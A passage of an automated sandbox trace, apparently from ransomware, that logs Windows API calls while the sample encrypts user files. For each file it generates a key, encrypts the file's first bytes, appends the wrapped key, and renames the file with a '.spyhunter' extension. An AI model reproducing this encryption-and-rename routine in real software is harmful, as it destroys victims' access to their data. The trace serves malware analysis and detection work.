lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1d4*=0xa, lpOverlapped=0x0) returned 1 [0140.953] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.953] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1d4*=0xa, lpOverlapped=0x0) returned 1 [0140.954] GetProcessHeap () returned 0x2c0000 [0140.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.954] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.954] WriteFile (in: hFile=0x178, lpBuffer=0x57f214*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x57f214*, lpNumberOfBytesWritten=0x57f1d4*=0x4, lpOverlapped=0x0) returned 1 [0140.954] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1d4*=0x30, lpOverlapped=0x0) returned 1 [0140.954] CloseHandle (hObject=0x178) returned 1 [0140.954] GetProcessHeap () returned 0x2c0000 [0140.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.954] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.spyhunter") returned 115 [0140.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.spyhunter")) returned 1 [0140.955] GetProcessHeap () returned 0x2c0000 [0140.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.955] GetProcessHeap () returned 0x2c0000 [0140.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.955] GetProcessHeap () returned 0x2c0000 [0140.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc02a0 | out: hHeap=0x2c0000) returned 1 [0140.959] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f218 | out: pbBuffer=0x57f218) returned 1 [0140.959] GetProcessHeap () returned 0x2c0000 [0140.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.959] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f210*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f210*=0x30) returned 1 [0140.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0140.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0140.970] StrStrW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".txt") returned 0x0 [0140.970] GetProcessHeap () returned 0x2c0000 [0140.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.971] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1d4*=0x2800, lpOverlapped=0x0) returned 1 [0141.010] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.010] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1d4*=0x2800, lpOverlapped=0x0) returned 1 [0141.010] GetProcessHeap () returned 0x2c0000 [0141.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.010] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.011] WriteFile (in: hFile=0x158, lpBuffer=0x57f214*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x57f214*, lpNumberOfBytesWritten=0x57f1d4*=0x4, lpOverlapped=0x0) returned 1 [0141.022] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1d4*=0x30, lpOverlapped=0x0) returned 1 [0141.022] CloseHandle (hObject=0x158) returned 1 [0141.022] GetProcessHeap () returned 0x2c0000 [0141.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0141.022] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.spyhunter") returned 141 [0141.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.spyhunter")) returned 1 [0141.023] GetProcessHeap () returned 0x2c0000 [0141.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0141.023] GetProcessHeap () returned 0x2c0000 [0141.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.023] GetProcessHeap () returned 0x2c0000 [0141.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4290 | out: hHeap=0x2c0000) returned 1 [0141.025] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f208 | out: pbBuffer=0x57f208) returned 1 [0141.025] GetProcessHeap () returned 0x2c0000 [0141.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.025] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f200*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f200*=0x30) returned 1 [0141.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8s9 SiReX7QdFh.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8s9 sirex7qdfh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8s9 SiReX7QdFh.jpg") returned 68 [0141.026] StrStrW (lpFirst="8s9 SiReX7QdFh.jpg", lpSrch=".txt") returned 0x0 [0141.026] GetProcessHeap () returned 0x2c0000 [0141.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.026] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1c4*=0x2800, lpOverlapped=0x0) returned 1 [0141.026] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.027] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1c4*=0x2800, lpOverlapped=0x0) returned 1 [0141.027] GetProcessHeap () returned 0x2c0000 [0141.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.027] WriteFile (in: hFile=0x158, lpBuffer=0x57f204*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x57f204*, lpNumberOfBytesWritten=0x57f1c4*=0x4, lpOverlapped=0x0) returned 1 [0141.027] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1c4*=0x30, lpOverlapped=0x0) returned 1 [0141.027] CloseHandle (hObject=0x158) returned 1 [0141.027] GetProcessHeap () returned 0x2c0000 [0141.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0141.027] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8s9 SiReX7QdFh.jpg.spyhunter") returned 78 [0141.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8s9 SiReX7QdFh.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8s9 sirex7qdfh.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8s9 SiReX7QdFh.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8s9 sirex7qdfh.jpg.spyhunter")) returned 1 [0141.028] GetProcessHeap () returned 0x2c0000 [0141.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0141.028] GetProcessHeap () returned 0x2c0000 [0141.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.028] GetProcessHeap () returned 0x2c0000 [0141.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81468 | out: hHeap=0x2c0000) returned 1 [0141.028] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f208 | out: pbBuffer=0x57f208) returned 1 [0141.028] GetProcessHeap () returned 0x2c0000 [0141.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.028] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f200*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f200*=0x30) returned 1 [0141.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4rWe-W.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4rwe-w.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.029] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4rWe-W.mp4") returned 60 [0141.029] StrStrW (lpFirst="4rWe-W.mp4", lpSrch=".txt") returned 0x0 [0141.029] GetProcessHeap () returned 0x2c0000 [0141.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.029] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1c4*=0x2800, lpOverlapped=0x0) returned 1 [0141.030] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.030] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1c4*=0x2800, lpOverlapped=0x0) returned 1 [0141.030] GetProcessHeap () returned 0x2c0000 [0141.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.030] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.030] WriteFile (in: hFile=0x158, lpBuffer=0x57f204*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x57f204*, lpNumberOfBytesWritten=0x57f1c4*=0x4, lpOverlapped=0x0) returned 1 [0141.030] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1c4*=0x30, lpOverlapped=0x0) returned 1 [0141.030] CloseHandle (hObject=0x158) returned 1 [0141.030] GetProcessHeap () returned 0x2c0000 [0141.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0141.030] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4rWe-W.mp4.spyhunter") returned 70 [0141.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4rWe-W.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4rwe-w.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4rWe-W.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4rwe-w.mp4.spyhunter")) returned 1 [0141.031] GetProcessHeap () returned 0x2c0000 [0141.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0141.031] GetProcessHeap () returned 0x2c0000 [0141.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.031] GetProcessHeap () returned 0x2c0000 [0141.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85870 | out: hHeap=0x2c0000) returned 1 [0141.031] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f200 | out: pbBuffer=0x57f200) returned 1 [0141.031] GetProcessHeap () returned 0x2c0000 [0141.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.031] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1f8*=0x30) returned 1 [0141.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Oo0yBdh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1oo0ybdh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Oo0yBdh.avi") returned 62 [0141.033] StrStrW (lpFirst="1Oo0yBdh.avi", lpSrch=".txt") returned 0x0 [0141.033] GetProcessHeap () returned 0x2c0000 [0141.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.033] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1bc*=0x2800, lpOverlapped=0x0) returned 1 [0141.034] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.034] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1bc*=0x2800, lpOverlapped=0x0) returned 1 [0141.034] GetProcessHeap () returned 0x2c0000 [0141.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.034] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.034] WriteFile (in: hFile=0x158, lpBuffer=0x57f1fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x57f1fc*, lpNumberOfBytesWritten=0x57f1bc*=0x4, lpOverlapped=0x0) returned 1 [0141.035] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1bc*=0x30, lpOverlapped=0x0) returned 1 [0141.035] CloseHandle (hObject=0x158) returned 1 [0141.035] GetProcessHeap () returned 0x2c0000 [0141.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0141.035] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Oo0yBdh.avi.spyhunter") returned 72 [0141.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Oo0yBdh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1oo0ybdh.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Oo0yBdh.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1oo0ybdh.avi.spyhunter")) returned 1 [0141.036] GetProcessHeap () returned 0x2c0000 [0141.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0141.036] GetProcessHeap () returned 0x2c0000 [0141.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.036] GetProcessHeap () returned 0x2c0000 [0141.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c857a8 | out: hHeap=0x2c0000) returned 1 [0141.036] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f200 | out: pbBuffer=0x57f200) returned 1 [0141.036] GetProcessHeap () returned 0x2c0000 [0141.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.036] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1f8*=0x30) returned 1 [0141.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0Ic7w30QFYQOX7UKQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ic7w30qfyqox7ukq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0Ic7w30QFYQOX7UKQ.mkv") returned 71 [0141.036] StrStrW (lpFirst="0Ic7w30QFYQOX7UKQ.mkv", lpSrch=".txt") returned 0x0 [0141.036] GetProcessHeap () returned 0x2c0000 [0141.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.036] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1bc*=0x2800, lpOverlapped=0x0) returned 1 [0141.037] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.038] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1bc*=0x2800, lpOverlapped=0x0) returned 1 [0141.038] GetProcessHeap () returned 0x2c0000 [0141.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.038] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.038] WriteFile (in: hFile=0x158, lpBuffer=0x57f1fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x57f1fc*, lpNumberOfBytesWritten=0x57f1bc*=0x4, lpOverlapped=0x0) returned 1 [0141.038] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1bc*=0x30, lpOverlapped=0x0) returned 1 [0141.038] CloseHandle (hObject=0x158) returned 1 [0141.038] GetProcessHeap () returned 0x2c0000 [0141.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0141.038] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0Ic7w30QFYQOX7UKQ.mkv.spyhunter") returned 81 [0141.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0Ic7w30QFYQOX7UKQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ic7w30qfyqox7ukq.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0Ic7w30QFYQOX7UKQ.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0ic7w30qfyqox7ukq.mkv.spyhunter")) returned 1 [0141.039] GetProcessHeap () returned 0x2c0000 [0141.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0141.039] GetProcessHeap () returned 0x2c0000 [0141.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.039] GetProcessHeap () returned 0x2c0000 [0141.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81390 | out: hHeap=0x2c0000) returned 1 [0141.039] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1f8 | out: pbBuffer=0x57f1f8) returned 1 [0141.039] GetProcessHeap () returned 0x2c0000 [0141.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.039] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1f0*=0x30) returned 1 [0141.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-bFAQxJ1OVDm-Wxss.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-bfaqxj1ovdm-wxss.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-bFAQxJ1OVDm-Wxss.m4a") returned 71 [0141.040] StrStrW (lpFirst="-bFAQxJ1OVDm-Wxss.m4a", lpSrch=".txt") returned 0x0 [0141.040] GetProcessHeap () returned 0x2c0000 [0141.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.040] 